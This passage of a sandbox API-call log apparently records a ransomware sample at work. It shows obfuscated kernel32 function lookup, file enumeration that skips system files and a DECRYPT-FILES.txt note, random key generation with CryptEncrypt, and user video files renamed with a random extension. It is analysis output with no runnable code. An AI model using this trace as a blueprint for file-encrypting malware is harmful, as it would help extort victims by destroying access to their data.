lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.345] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.345] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.345] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.345] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.345] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.345] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.345] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.345] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.345] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.345] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.345] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.345] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.345] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.345] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.345] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.345] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.346] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.346] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.346] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.346] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.346] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.346] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.346] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.346] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.346] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.346] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.346] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.346] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.346] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.346] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.346] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.346] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.346] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.346] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.346] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.347] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.347] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.347] lstrlenA (lpString="DELETEATOM") returned 10 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.347] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.347] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.347] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.347] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.347] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.347] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.347] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.347] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.347] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.347] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.347] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.347] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.347] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.347] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.347] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.347] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.348] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.348] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.348] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.348] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.348] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.348] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.348] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.348] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.348] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.348] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.348] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.348] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.348] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.348] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.348] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.348] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.348] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.348] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.349] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.349] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.349] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.349] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.349] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.349] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.349] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.349] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv") returned 65 [0087.349] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv.Z1Ddd") returned 71 [0087.349] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\dz3nowa.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\dZ3NoWA.flv.Z1Ddd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\dz3nowa.flv.z1ddd"), dwFlags=0x0) returned 1 [0087.350] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.350] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.350] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.350] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6f6320, ftCreationTime.dwHighDateTime=0x1d4cb46, ftLastAccessTime.dwLowDateTime=0x23378b80, ftLastAccessTime.dwHighDateTime=0x1d4cc5b, ftLastWriteTime.dwLowDateTime=0x23378b80, ftLastWriteTime.dwHighDateTime=0x1d4cc5b, nFileSizeHigh=0x0, nFileSizeLow=0x156d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="EiBG_LHlML2AunS7K.swf", cAlternateFileName="EIBG_L~1.SWF")) returned 1 [0087.350] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0087.350] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="autorun.inf") returned 1 [0087.350] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="boot.ini") returned 1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="desktop.ini") returned 1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="ntuser.dat") returned -1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="iconcache.db") returned -1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="bootsect.bak") returned 1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="ntuser.dat.log") returned -1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="thumbs.db") returned -1 [0087.351] lstrcmpiW (lpString1="EiBG_LHlML2AunS7K.swf", lpString2="Bootfont.bin") returned 1 [0087.351] lstrlenW (lpString="EiBG_LHlML2AunS7K.swf") returned 21 [0087.351] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.351] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.351] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.351] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.351] lstrlenW (lpString="EiBG_LHlML2AunS7K.swf") returned 21 [0087.351] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="EiBG_LHlML2AunS7K.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf" [0087.351] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\EiBG_LHlML2AunS7K.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\eibg_lhlml2auns7k.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.351] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=87765) returned 1 [0087.351] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.352] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.352] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.352] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.352] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.352] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.352] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.355] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.355] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.357] CloseHandle (hObject=0x42c) returned 1 [0087.357] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.357] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.358] CloseHandle (hObject=0x0) returned 0 [0087.358] CloseHandle (hObject=0x428) returned 1 [0087.358] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.358] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.358] GetTickCount () returned 0x114e495 [0087.358] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.359] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.359] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.359] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.359] lstrlenA (lpString="kernel32.dll") returned 12 [0087.359] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.359] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.359] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.359] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.359] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.360] lstrlenA (lpString="ADDATOMA") returned 8 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.360] lstrlenA (lpString="ADDATOMW") returned 8 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.360] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.360] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.360] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.360] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: 